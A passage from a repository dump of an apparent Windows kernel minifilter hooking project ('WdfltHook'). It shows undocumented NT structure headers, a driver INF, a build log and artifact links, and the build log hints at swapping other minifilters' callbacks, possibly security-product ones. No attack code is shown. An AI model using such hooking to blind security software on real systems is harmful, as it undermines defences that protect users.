PPEB_LDR_DATA Ldr; 196 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 197 | PVOID Reserved4[3]; 198 | PVOID AtlThunkSListPtr; 199 | PVOID Reserved5; 200 | ULONG Reserved6; 201 | PVOID Reserved7; 202 | ULONG Reserved8; 203 | ULONG AtlThunkSListPtr32; 204 | PVOID Reserved9[45]; 205 | BYTE Reserved10[96]; 206 | PVOID PostProcessInitRoutine; 207 | BYTE Reserved11[128]; 208 | PVOID Reserved12[1]; 209 | ULONG SessionId; 210 | } PEB, * PPEB; 211 | 212 | // Modified LDR_DATA_TABLE_ENTRY definition (this one includes BaseDllName field and has InMemoryOrderLinks at the top for easier processing) 213 | typedef struct _LDR_DATA_TABLE_ENTRY { 214 | /*LIST_ENTRY InLoadOrderLinks;*/ 215 | LIST_ENTRY InMemoryOrderLinks; 216 | LIST_ENTRY InInitializationOrderList; 217 | PVOID DllBase; 218 | PVOID EntryPoint; 219 | PVOID Reserved3; 220 | UNICODE_STRING FullDllName; 221 | UNICODE_STRING BaseDllName; 222 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 223 | 224 | typedef struct _TEB { 225 | PVOID Reserved1[12]; 226 | PPEB ProcessEnvironmentBlock; 227 | PVOID Reserved2[399]; 228 | BYTE Reserved3[1952]; 229 | PVOID TlsSlots[64]; 230 | BYTE Reserved4[8]; 231 | PVOID Reserved5[26]; 232 | PVOID ReservedForOle; // Windows 2000 only 233 | PVOID Reserved6[4]; 234 | PVOID TlsExpansionSlots; 235 | } TEB, * PTEB; 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | /* 244 | NtCreateFile 245 | */ 246 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 247 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 248 | (p)->RootDirectory = r; \ 249 | (p)->Attributes = a; \ 250 | (p)->ObjectName = n; \ 251 | (p)->SecurityDescriptor = s; \ 252 | (p)->SecurityQualityOfService = NULL; \ 253 | } 254 | 255 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 256 | 257 | /* 258 | valid values for the attributes field 259 | */ 260 | #define OBJ_INHERIT 0x00000002L 261 | #define OBJ_PERMANENT 0x00000010L 262 | #define OBJ_EXCLUSIVE 0x00000020L 263 | #define OBJ_CASE_INSENSITIVE 0x00000040L 264 | #define 
OBJ_OPENIF 0x00000080L 265 | #define OBJ_OPENLINK 0x00000100L 266 | #define OBJ_KERNEL_HANDLE 0x00000200L 267 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400L 268 | #define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800L 269 | #define OBJ_DONT_REPARSE 0x00001000L 270 | #define OBJ_VALID_ATTRIBUTES 0x00001FF2 271 | 272 | 273 | 274 | /* 275 | NtQueryInformationFile 276 | */ 277 | 278 | 279 | #define FileStandardInformation 5 // QUERY: FILE_STANDARD_INFORMATION 280 | 281 | 282 | 283 | /* 284 | NtOpenProcess 285 | */ 286 | 287 | 288 | typedef struct _SYSTEM_PROCESS_INFO 289 | { 290 | ULONG NextEntryOffset; 291 | ULONG NumberOfThreads; 292 | LARGE_INTEGER Reserved[3]; 293 | LARGE_INTEGER CreateTime; 294 | LARGE_INTEGER UserTime; 295 | LARGE_INTEGER KernelTime; 296 | UNICODE_STRING ImageName; 297 | ULONG BasePriority; 298 | HANDLE ProcessId; 299 | HANDLE InheritedFromProcessId; 300 | }SYSTEM_PROCESS_INFO, * PSYSTEM_PROCESS_INFO; 301 | 302 | 303 | /* 304 | NtCreateUserProcess 305 | */ 306 | 307 | #define RTL_USER_PROCESS_PARAMETERS_NORMALIZED 0x01 308 | 309 | // ProcessFlags 310 | #define PROCESS_CREATE_FLAGS_PROTECTED_PROCESS 0x00000040 311 | #define PROCESS_CREATE_FLAGS_CREATE_SESSION 0x00000080 // ? 312 | #define PROCESS_CREATE_FLAGS_INHERIT_FROM_PARENT 0x00000100 313 | #define PROCESS_CREATE_FLAGS_SUSPENDED 0x00000200 314 | #define PROCESS_CREATE_FLAGS_EXTENDED_UNKNOWN 0x00000400 315 | 316 | // ThreadFlags 317 | #define THREAD_CREATE_FLAGS_CREATE_SUSPENDED 0x00000001 318 | #define THREAD_CREATE_FLAGS_SKIP_THREAD_ATTACH 0x00000002 // ? 319 | #define THREAD_CREATE_FLAGS_HIDE_FROM_DEBUGGER 0x00000004 320 | #define THREAD_CREATE_FLAGS_HAS_SECURITY_DESCRIPTOR 0x00000010 // ? 321 | #define THREAD_CREATE_FLAGS_ACCESS_CHECK_IN_TARGET 0x00000020 // ? 
322 | #define THREAD_CREATE_FLAGS_INITIAL_THREAD 0x00000080 323 | // end_rev 324 | 325 | // windows-internals-book:"Chapter 5" 326 | typedef enum _PS_CREATE_STATE { 327 | PsCreateInitialState, 328 | PsCreateFailOnFileOpen, 329 | PsCreateFailOnSectionCreate, 330 | PsCreateFailExeFormat, 331 | PsCreateFailMachineMismatch, 332 | PsCreateFailExeName, // Debugger specified 333 | PsCreateSuccess, 334 | PsCreateMaximumStates 335 | } PS_CREATE_STATE; 336 | 337 | typedef struct _PS_CREATE_INFO { 338 | SIZE_T Size; 339 | PS_CREATE_STATE State; 340 | union { 341 | // PsCreateInitialState 342 | struct { 343 | union { 344 | ULONG InitFlags; 345 | struct { 346 | UCHAR WriteOutputOnExit : 1; 347 | UCHAR DetectManifest : 1; 348 | UCHAR IFEOSkipDebugger : 1; 349 | UCHAR IFEODoNotPropagateKeyState : 1; 350 | UCHAR SpareBits1 : 4; 351 | UCHAR SpareBits2 : 8; 352 | USHORT ProhibitedImageCharacteristics : 16; 353 | }; 354 | }; 355 | ACCESS_MASK AdditionalFileAccess; 356 | } InitState; 357 | 358 | // PsCreateFailOnSectionCreate 359 | struct { 360 | HANDLE FileHandle; 361 | } FailSection; 362 | 363 | // PsCreateFailExeFormat 364 | struct { 365 | USHORT DllCharacteristics; 366 | } ExeFormat; 367 | 368 | // PsCreateFailExeName 369 | struct { 370 | HANDLE IFEOKey; 371 | } ExeName; 372 | 373 | // PsCreateSuccess 374 | struct { 375 | union { 376 | ULONG OutputFlags; 377 | struct { 378 | UCHAR ProtectedProcess : 1; 379 | UCHAR AddressSpaceOverride : 1; 380 | UCHAR DevOverrideEnabled : 1; // from Image File Execution Options 381 | UCHAR ManifestDetected : 1; 382 | UCHAR ProtectedProcessLight : 1; 383 | UCHAR SpareBits1 : 3; 384 | UCHAR SpareBits2 : 8; 385 | USHORT SpareBits3 : 16; 386 | }; 387 | }; 388 | HANDLE FileHandle; 389 | HANDLE SectionHandle; 390 | ULONGLONG UserProcessParametersNative; 391 | ULONG UserProcessParametersWow64; 392 | ULONG CurrentParameterFlags; 393 | ULONGLONG PebAddressNative; 394 | ULONG PebAddressWow64; 395 | ULONGLONG ManifestAddress; 396 | ULONG ManifestSize; 397 | 
} SuccessState; 398 | }; 399 | } PS_CREATE_INFO, * PPS_CREATE_INFO; 400 | 401 | // begin_rev 402 | #define PS_ATTRIBUTE_NUMBER_MASK 0x0000ffff 403 | #define PS_ATTRIBUTE_THREAD 0x00010000 // can be used with threads 404 | #define PS_ATTRIBUTE_INPUT 0x00020000 // input only 405 | #define PS_ATTRIBUTE_ADDITIVE 0x00040000 /// Is an additional option (see ProcThreadAttributeValue in WinBase.h) 406 | // end_rev 407 | 408 | typedef enum _PS_ATTRIBUTE_NUM { 409 | PsAttributeParentProcess, // in HANDLE 410 | PsAttributeDebugPort, // in HANDLE 411 | PsAttributeToken, // in HANDLE 412 | PsAttributeClientId, // out PCLIENT_ID 413 | PsAttributeTebAddress, // out PTEB 414 | PsAttributeImageName, // in PWSTR 415 | PsAttributeImageInfo, // out PSECTION_IMAGE_INFORMATION 416 | PsAttributeMemoryReserve, // in PPS_MEMORY_RESERVE 417 | PsAttributePriorityClass, // in UCHAR 418 | PsAttributeErrorMode, // in ULONG 419 | PsAttributeStdHandleInfo, // 10, in PPS_STD_HANDLE_INFO 420 | PsAttributeHandleList, // in PHANDLE 421 | PsAttributeGroupAffinity, // in PGROUP_AFFINITY 422 | PsAttributePreferredNode, // in PUSHORT 423 | PsAttributeIdealProcessor, // in PPROCESSOR_NUMBER 424 | PsAttributeUmsThread, // see UpdateProceThreadAttributeList in msdn (CreateProcessA/W...) in PUMS_CREATE_THREAD_ATTRIBUTES 425 | PsAttributeMitigationOptions, // in UCHAR 426 | PsAttributeProtectionLevel, 427 | PsAttributeSecureProcess, // since THRESHOLD (Virtual Secure Mode, Device Guard) 428 | PsAttributeJobList, 429 | PsAttributeMax 430 | } PS_ATTRIBUTE_NUM; 431 | 432 | #define PsAttributeValue(Number, Thread, Input, Additive) \ 433 | (((Number) & PS_ATTRIBUTE_NUMBER_MASK) | \ 434 | ((Thread) ? PS_ATTRIBUTE_THREAD : 0) | \ 435 | ((Input) ? PS_ATTRIBUTE_INPUT : 0) | \ 436 | ((Additive) ? 
PS_ATTRIBUTE_ADDITIVE : 0)) 437 | 438 | typedef struct _PS_ATTRIBUTE { 439 | ULONGLONG Attribute; /// PROC_THREAD_ATTRIBUTE_XXX | PROC_THREAD_ATTRIBUTE_XXX modifiers, see ProcThreadAttributeValue macro and Windows Internals 6 (372) 440 | SIZE_T Size; /// Size of Value or *ValuePtr 441 | union { 442 | ULONG_PTR Value; /// Reserve 8 bytes for data (such as a Handle or a data pointer) 443 | PVOID ValuePtr; /// data pointer 444 | }; 445 | PSIZE_T ReturnLength; /// Either 0 or specifies size of data returned to caller via "ValuePtr" 446 | } PS_ATTRIBUTE, * PPS_ATTRIBUTE; 447 | 448 | typedef struct _PS_ATTRIBUTE_LIST { 449 | SIZE_T TotalLength; /// sizeof(PS_ATTRIBUTE_LIST) 450 | PS_ATTRIBUTE Attributes[2]; /// Depends on how many attribute entries should be supplied to NtCreateUserProcess 451 | } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST; 452 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/restore_list.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | typedef struct _RESTORE_NODE 5 | { 6 | PVOID AddrOfCallback; 7 | LONG64 Callback; 8 | struct _RESTORE_NODE* Next; 9 | 10 | }RESTORE_NODE, *PRESTORE_NODE; 11 | 12 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.inf: -------------------------------------------------------------------------------- 1 | ;;; 2 | ;;; WdfltHook 3 | ;;; 4 | 5 | [Version] 6 | Signature = "$Windows NT$" 7 | ; TODO - Change the Class and ClassGuid to match the Load Order Group value, see https://msdn.microsoft.com/en-us/windows/hardware/gg462963 8 | ; Class = "ActivityMonitor" ;This is determined by the work this filter driver does 9 | ; ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Load Order Group value 10 | Class = "ActivityMonitor" 11 | ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} 12 | Provider = 
"Template" 13 | DriverVer = 10/31/2023,22.16.51.732 14 | CatalogFile = WdfltHook.cat 15 | PnpLockDown=1 16 | 17 | [DestinationDirs] 18 | DefaultDestDir = 12 19 | MiniFilter.DriverFiles = 12 ;%windir%\system32\drivers 20 | 21 | ;; 22 | ;; Default install sections 23 | ;; 24 | 25 | [DefaultInstall] 26 | OptionDesc = %ServiceDescription% 27 | CopyFiles = MiniFilter.DriverFiles 28 | 29 | [DefaultInstall.Services] 30 | AddService = %ServiceName%,,MiniFilter.Service 31 | 32 | ;; 33 | ;; Default uninstall sections 34 | ;; 35 | 36 | [DefaultUninstall] 37 | DelFiles = MiniFilter.DriverFiles 38 | 39 | [DefaultUninstall.Services] 40 | DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting 41 | 42 | ; 43 | ; Services Section 44 | ; 45 | 46 | [MiniFilter.Service] 47 | DisplayName = %ServiceName% 48 | Description = %ServiceDescription% 49 | ServiceBinary = %12%\%DriverName%.sys ;%windir%\system32\drivers\ 50 | Dependencies = "FltMgr" 51 | ServiceType = 2 ;SERVICE_FILE_SYSTEM_DRIVER 52 | StartType = 3 ;SERVICE_DEMAND_START 53 | ErrorControl = 1 ;SERVICE_ERROR_NORMAL 54 | ; TODO - Change the Load Order Group value 55 | ; LoadOrderGroup = "FSFilter Activity Monitor" 56 | LoadOrderGroup = "FSFilter Activity Monitor" 57 | AddReg = MiniFilter.AddRegistry 58 | 59 | ; 60 | ; Registry Modifications 61 | ; 62 | 63 | [MiniFilter.AddRegistry] 64 | HKR,,"DebugFlags",0x00010001 ,0x0 65 | HKR,,"SupportedFeatures",0x00010001,0x3 66 | HKR,"Instances","DefaultInstance",0x00000000,%DefaultInstance% 67 | HKR,"Instances\"%Instance1.Name%,"Altitude",0x00000000,%Instance1.Altitude% 68 | HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags% 69 | 70 | ; 71 | ; Copy Files 72 | ; 73 | 74 | [MiniFilter.DriverFiles] 75 | %DriverName%.sys 76 | 77 | [SourceDisksFiles] 78 | WdfltHook.sys = 1,, 79 | 80 | [SourceDisksNames] 81 | 1 = %DiskId1%,,, 82 | 83 | ;; 84 | ;; String Section 85 | ;; 86 | 87 | [Strings] 88 | ServiceDescription = "WdfltHook Mini-Filter Driver" 89 | 
ServiceName = "WdfltHook" 90 | DriverName = "WdfltHook" 91 | DiskId1 = "WdfltHook Device Installation Disk" 92 | 93 | ;Instances specific information. 94 | DefaultInstance = "WdfltHook Instance" 95 | Instance1.Name = "WdfltHook Instance" 96 | ; TODO - Change the altitude value, see https://msdn.microsoft.com/en-us/windows/hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers 97 | Instance1.Altitude = "370030" 98 | Instance1.Flags = 0x0 ; Allow all attachments 99 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.log: -------------------------------------------------------------------------------- 1 |  Building 'WdfltHook' with toolset 'WindowsKernelModeDriver10.0' and the 'Desktop' target platform. 2 | Stamping x64\Release\WdfltHook.inf 3 | Stamping [Version] section with DriverVer=10/31/2023,22.16.51.732 4 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.inf : warning 1420: [DefaultInstall]-based INF cannot be processed as Primitive. 5 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.inf(25-25): warning 1421: Section [DefaultInstall] should have an architecture decoration. 6 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.inf(36-36): warning 1421: Section [DefaultUninstall] should have an architecture decoration. 7 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.inf(74-74): warning 1205: Section [MiniFilter.DriverFiles] referenced from DelFiles and CopyFiles directive. 
8 | WdfltHook.c 9 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(270,1): warning C4005: 'OBJ_VALID_ATTRIBUTES': macro redefinition 10 | C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\shared\ntdef.h(1785): message : see previous definition of 'OBJ_VALID_ATTRIBUTES' 11 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(353,6): warning C4201: nonstandard extension used: nameless struct/union 12 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(354,5): warning C4201: nonstandard extension used: nameless struct/union 13 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(386,6): warning C4201: nonstandard extension used: nameless struct/union 14 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(387,5): warning C4201: nonstandard extension used: nameless struct/union 15 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(398,3): warning C4201: nonstandard extension used: nameless struct/union 16 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\ntdefs.h(444,3): warning C4201: nonstandard extension used: nameless struct/union 17 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(340,10): warning C4189: 'output': local variable is initialized but not referenced 18 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(335,11): warning C4189: 'LocalIntBase': local variable is initialized but not referenced 19 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(442,120): warning C4047: 'function': 'LONG64' differs in levels of indirection from 'PVOID' 20 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(442,106): warning C4024: 'SaveOrigCallback': different types for formal and actual parameter 2 21 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(443,96): warning C4047: 'function': 'volatile __int64 *' differs in levels of indirection from 'PVOID *' 22 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(443,68): warning C4024: 
'_InterlockedExchange64': different types for formal and actual parameter 1 23 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(443,119): warning C4047: 'function': '__int64' differs in levels of indirection from 'FLT_PREOP_CALLBACK_STATUS (__cdecl *)(PFLT_CALLBACK_DATA,PCFLT_RELATED_OBJECTS,PVOID *)' 24 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(443,98): warning C4024: '_InterlockedExchange64': different types for formal and actual parameter 2 25 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(447,122): warning C4047: 'function': 'LONG64' differs in levels of indirection from 'PVOID' 26 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(447,107): warning C4024: 'SaveOrigCallback': different types for formal and actual parameter 2 27 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(448,97): warning C4047: 'function': 'volatile __int64 *' differs in levels of indirection from 'PVOID *' 28 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(448,68): warning C4024: '_InterlockedExchange64': different types for formal and actual parameter 1 29 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(448,121): warning C4047: 'function': '__int64' differs in levels of indirection from 'FLT_POSTOP_CALLBACK_STATUS (__cdecl *)(PFLT_CALLBACK_DATA,PCFLT_RELATED_OBJECTS,PVOID,FLT_POST_OPERATION_FLAGS)' 30 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(448,99): warning C4024: '_InterlockedExchange64': different types for formal and actual parameter 2 31 | C:\Users\dorge\source\repos\WdfltHook\WdfltHook\WdfltHook.c(414,40): warning C4189: 'TargetCallbackNode': local variable is initialized but not referenced 32 | WdfltHook.vcxproj -> C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook.sys 33 | Done Adding Additional Store 34 | Successfully signed: C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook.sys 35 | 36 | ......................... 
37 | Signability test complete. 38 | 39 | Errors: 40 | None 41 | 42 | Warnings: 43 | None 44 | 45 | Catalog generation complete. 46 | C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook\wdflthook.cat 47 | Done Adding Additional Store 48 | Successfully signed: C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook\wdflthook.cat 49 | 50 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.obj -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.res -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.sys.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\dorge\source\repos\WdfltHook\x64\Release\WdfltHook.sys 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.read.1.tlog: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/Inf2Cat.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/Inf2Cat.command.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/WdfltHook.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=WindowsKernelModeDriver10.0:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\dorge\source\repos\WdfltHook\| 3 | -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10100.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10100.read.1.tlog -------------------------------------------------------------------------------- 
/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10100.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10100.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10144.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10144.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10144.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10144.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10320.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10320.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10320.write.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10320.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10720.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10720.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10720.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10720.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10748.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10748.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10748.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10748.write.1.tlog -------------------------------------------------------------------------------- 
/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10780.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10780.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10780.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.10780.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11144.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11144.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11144.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11144.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11200.read.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11200.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11200.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11200.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11596.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11596.read.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11596.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.11596.write.1.tlog -------------------------------------------------------------------------------- /WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.2880.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0mWindyBug/MinifilterHook/dd2f68a28036b6c3c9949732fdb837aee6e5e8e4/WdfltHook/WdfltHook/x64/Release/WdfltHook.tlog/inf2cat-expand.2880.read.1.tlog -------------------------------------------------------------------------------- 
